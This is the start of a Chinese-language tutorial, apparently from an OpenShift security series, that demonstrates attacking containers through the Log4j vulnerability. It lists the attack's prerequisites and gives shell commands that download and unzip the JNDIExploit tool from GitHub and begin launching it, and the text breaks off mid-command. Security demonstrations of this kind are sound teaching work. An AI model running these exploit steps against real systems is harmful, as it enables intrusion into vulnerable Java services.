OpenShift Security (13) - 利用Log4j漏洞攻击容器(附视频)漏洞攻击过程演示视频
利用Log4j漏洞攻击容器需要有2个条件,1)Java应用中包含受到漏洞影响的Log4j。2)带有“JNDI 注入”的运行环境。以下在 2 个节点上进行验证:在 172.17.0.30 上执行以下命令,运行带有 “JNDI 注入” 的环境。$ curl -OL https://github.com/giterlizzi/JNDIExploit/releases/download/v1.2/JNDIExploit.zip$ unzip JNDIExploit.zip$ java -jar JND